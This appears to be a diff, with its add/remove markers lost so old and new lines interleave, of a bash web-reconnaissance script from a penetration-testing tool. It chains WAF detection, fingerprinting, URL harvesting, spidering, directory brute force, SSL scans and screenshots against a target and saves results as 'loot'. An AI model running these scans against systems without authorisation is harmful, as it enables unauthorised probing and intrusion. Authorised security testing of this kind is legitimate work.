echo -e "$OKRED GATHERING HTTP INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN whatweb -a 3 http://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-http 2> /dev/null$RESET"
|
||||
fi
|
||||
whatweb -a 3 http://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-http.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-http.raw > $LOOT_DIR/web/whatweb-$TARGET-http.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/whatweb-$TARGET-http.raw 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 3 --max-time 3 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
|
||||
if [ "$PASSIVE_SPIDER" = "1" ]; then
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null$RESET"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl --connect-timeout=5 --max-time 3 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 5 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -s -R -L http://$TARGET > $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-http-$TARGET.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-http-$TARGET.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-http-$TARGET.txt 2> /dev/null
|
||||
if [ "$PASSIVE_SPIDER" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$WAYBACKMACHINE" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
blackwidow -u http://$TARGET -l 1
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN blackwidow -u http://$TARGET:80 -l 3 $RESET"
|
||||
fi
|
||||
blackwidow -u http://$TARGET:80 -l 3 -v n
|
||||
cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
if [ "$WEB_BRUTE_STEALTHSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm $RESET"
|
||||
fi
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_FAST -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget http://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-http.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=10000 2> /dev/null
|
||||
/bin/CutyCapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
else
|
||||
cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=10000 2> /dev/null
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null$RESET"
|
||||
fi
|
||||
cutycapt --url=http://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
|
||||
|
|
@ -170,30 +225,56 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "$OKRED + -- --=[Port 443 closed... skipping.$RESET"
|
||||
else
|
||||
echo -e "$OKORANGE + -- --=[Port 443 opened... running tests...$RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR WAF $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wafw00f https://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-https 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/waf-$TARGET-https > $LOOT_DIR/web/waf-$TARGET-https.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING HTTP INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
whatweb -a 3 https://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-https 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-https > $LOOT_DIR/web/whatweb-$TARGET-https.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING SERVER INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/wig/wig.py -d -q -t 50 https://$TARGET | tee $LOOT_DIR/web/wig-$TARGET-https
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-https > $LOOT_DIR/web/wig-$TARGET-https.txt 2> /dev/null
|
||||
if [ $WAFWOOF == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR WAF $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wafw00f https://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-https 2> /dev/null$RESET"
|
||||
fi
|
||||
wafw00f https://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-https.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/waf-$TARGET-https.raw > $LOOT_DIR/web/waf-$TARGET-https.txt 2> /dev/null
|
||||
rm -f tee $LOOT_DIR/web/waf-$TARGET-https.raw 2> /dev/null
|
||||
fi
|
||||
if [ $WHATWEB == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING HTTP INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN whatweb -a 3 https://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-https 2> /dev/null$RESET"
|
||||
fi
|
||||
whatweb -a 3 https://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-https 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-https > $LOOT_DIR/web/whatweb-$TARGET-https.txt 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 3 --max-time 3 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null$RESET"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl --connect-timeout=5 --max-time 3 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 5 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -s -R -L https://$TARGET > $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-https-$TARGET.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-https-$TARGET.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-https-$TARGET.txt 2> /dev/null
|
||||
if [ "$PASSIVE_SPIDER" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
|
|
@ -201,32 +282,48 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
blackwidow -u http://$TARGET -l 1
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN blackwidow -u https://$TARGET:443 -l 3$RESET"
|
||||
fi
|
||||
blackwidow -u https://$TARGET:443 -l 3 -v n
|
||||
cat /usr/share/blackwidow/$TARGET*/* >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_FAST -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
|
||||
if [ "$WEB_BRUTE_STEALTHSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm $RESET"
|
||||
fi
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
wget https://$TARGET/robots.txt -O $LOOT_DIR/web/robots-$TARGET-https.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$SSL" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING SSL/TLS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
sslyze --regular $TARGET | tee $LOOT_DIR/web/sslyze-$TARGET.txt 2> /dev/null
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN sslscan --no-failed $TARGET | tee $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null$RESET"
|
||||
fi
|
||||
sslscan --no-failed $TARGET | tee $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/sslscan-$TARGET.raw > $LOOT_DIR/web/sslscan-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/sslscan-$TARGET.raw 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=10000 2> /dev/null
|
||||
/bin/CutyCapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
else
|
||||
cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=10000 2> /dev/null
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null$RESET"
|
||||
fi
|
||||
cutycapt --url=https://$TARGET --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
fi
|
||||
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port443.jpg"
|
||||
fi
|
||||
|
|
@ -248,6 +345,7 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e ""
|
||||
echo -e ""
|
||||
echo -e ""
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
|
||||
if [ "$LOOT" = "1" ]; then
|
||||
loot
|
||||
|
|
|
|||
|
|
@ -72,197 +72,318 @@ if [ "$MODE" = "webporthttp" ]; then
|
|||
echo -e "$OKRED + -- --=[Port $PORT closed... skipping.$RESET"
|
||||
else
|
||||
echo -e "$OKORANGE + -- --=[Port $PORT opened... running tests...$RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR WAF $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wafw00f http://$TARGET:$PORT | tee $LOOT_DIR/web/waf-$TARGET-http-$PORT 2> /dev/null
|
||||
echo ""
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING HTTP INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
whatweb -a 3 http://$TARGET:$PORT | tee $LOOT_DIR/web/whatweb-$TARGET-http-$PORT 2> /dev/null
|
||||
echo ""
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING SERVER INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/wig/wig.py -d -q -t 50 http://$TARGET | tee $LOOT_DIR/web/wig-$TARGET-http
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-http > $LOOT_DIR/web/wig-$TARGET-http.txt 2> /dev/null
|
||||
if [ "$WAFWOOF" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR WAF $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wafw00f http://$TARGET:$PORT | tee $LOOT_DIR/web/waf-$TARGET-http-port$PORT.txt 2> /dev/null
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WHATWEB" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING HTTP INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
whatweb -a 3 http://$TARGET:$PORT | tee $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw > $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/whatweb-$TARGET-http-port$PORT.raw 2> /dev/null
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WIG" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING SERVER INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/wig/wig.py -d -q http://$TARGET:$PORT | tee $LOOT_DIR/web/wig-$TARGET-http-$PORT
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-http-$PORT > $LOOT_DIR/web/wig-$TARGET-http-$PORT.txt 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING HTTP HEADERS AND METHODS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wget -qO- -T 1 --connect-timeout=3 --read-timeout=3 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 3 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET:$PORT | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 3 -I -s -R http://$TARGET:$PORT | tee $LOOT_DIR/web/headers-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -I -s -R -L http://$TARGET:$PORT | tee $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | grep generator | cut -d\" -f4 2> /dev/null | tee $LOOT_DIR/web/webgenerator-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DISPLAYING COMMENTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | grep "<\!\-\-" 2> /dev/null | tee $LOOT_DIR/web/webcomments-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED DISPLAYING SITE LINKS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cat $LOOT_DIR/web/websource-http-$TARGET-$PORT.txt 2> /dev/null | egrep "\"" | cut -d\" -f2 | grep \/ | sort -u 2> /dev/null | tee $LOOT_DIR/web/weblinks-http-$TARGET-$PORT.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SAVING SCREENSHOTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port$PORT.jpg"
|
||||
if [ ${DISTRO} == "blackarch" ]; then
|
||||
/bin/CutyCapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=10000 2> /dev/null
|
||||
/bin/CutyCapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
else
|
